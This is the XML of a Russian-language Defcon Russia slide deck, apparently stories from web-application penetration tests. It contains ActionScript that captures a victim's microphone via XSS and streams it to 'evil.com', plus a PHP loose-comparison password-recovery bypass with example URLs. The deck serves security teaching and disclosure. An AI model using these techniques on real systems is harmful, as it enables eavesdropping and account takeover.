              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Молодцы, блин, привязали сессию к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP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02:20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нам нужны свежие мысли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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Ладно, если </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>колцентр</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> общается с пользователя голосом, попробуем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>снифать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> МИКРОФОН (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash)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Defcon Russia (DCG #7812)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6</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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117801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FUN#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>А как вы готовите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS?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sz="3800" b="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0" err="1"/>
              <a:t>www.kirupa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0"/>
              <a:t>/developer/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0" err="1"/>
              <a:t>actionscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>microphone.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>():void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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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nc.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(‘//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com’,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>"anchor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microphone.getMicrophone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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mic.rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11;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nc.addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetStatusEvent.NET_STATUS,checkConnect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private function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>checkConnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>e:NetStatusEvent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good=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>e.info.code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetConnection.Connect.Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (good)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this.attachAudio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this.publish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stream,"live</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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Defcon Russia (DCG #7812)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7</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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4168" y="4365104"/>
            <a:ext cx="271780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2843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FUN#3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Восстановление пароля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recover.php?email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=d0znpp@onsec.ru&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a8f5f167f44f4964e6c998dee827110c</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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ru-RU" dirty="0" smtClean="0"/>
              <a:t>Открывает сразу сессию для аккаунта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en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>recover.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>?email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=d0znpp@onsec.ru&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Т</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>оже</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> открывает сессию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Defcon Russia (DCG #7812)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8</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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9824" y="5164319"/>
            <a:ext cx="1584176" cy="1693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6698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FUN#3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Восстановление пароля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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>f($_GET[‘code’]==$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>code_from_db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 smtClean="0"/>
              <a:t>Используйте приведение типов.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Можем открыть новую сессию для любого аккаунта только по его </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>адресу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;)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Defcon Russia (DCG #7812)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9</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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9824" y="5164319"/>
            <a:ext cx="1584176" cy="1693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5306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</TotalTime>
  <Words>835</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>137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Тема Office</vt:lpstr>
      <vt:lpstr>Funny hack Забавные истории из практики анализа защищенности веб-приложений</vt:lpstr>
      <vt:lpstr>Откуда дровишки?</vt:lpstr>
      <vt:lpstr>Что за дровишки?</vt:lpstr>
      <vt:lpstr>FUN#1.  Забавная</vt:lpstr>
      <vt:lpstr>FUN#1.  Забавная</vt:lpstr>
      <vt:lpstr>FUN#2.  А как вы готовите XSS?</vt:lpstr>
      <vt:lpstr>FUN#2.  А как вы готовите XSS?</vt:lpstr>
      <vt:lpstr>FUN#3. Восстановление пароля</vt:lpstr>
      <vt:lpstr>FUN#3. Восстановление пароля</vt:lpstr>
      <vt:lpstr>FUN#4. Очень большой портал</vt:lpstr>
      <vt:lpstr>FUN#4. Очень большой портал</vt:lpstr>
      <vt:lpstr>FUN#5. Шифрованный ViewState </vt:lpstr>
      <vt:lpstr>FUN#5. Шифрованный ViewState </vt:lpstr>
      <vt:lpstr>Спасибо! Вопросы?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Funny hack Забавные истории из практики анализа защищенности веб-приложений</dc:title>
  <cp:lastModifiedBy>Something else</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-02-16T12:13:33Z</dcterms:modified>
</cp:coreProperties>
</file>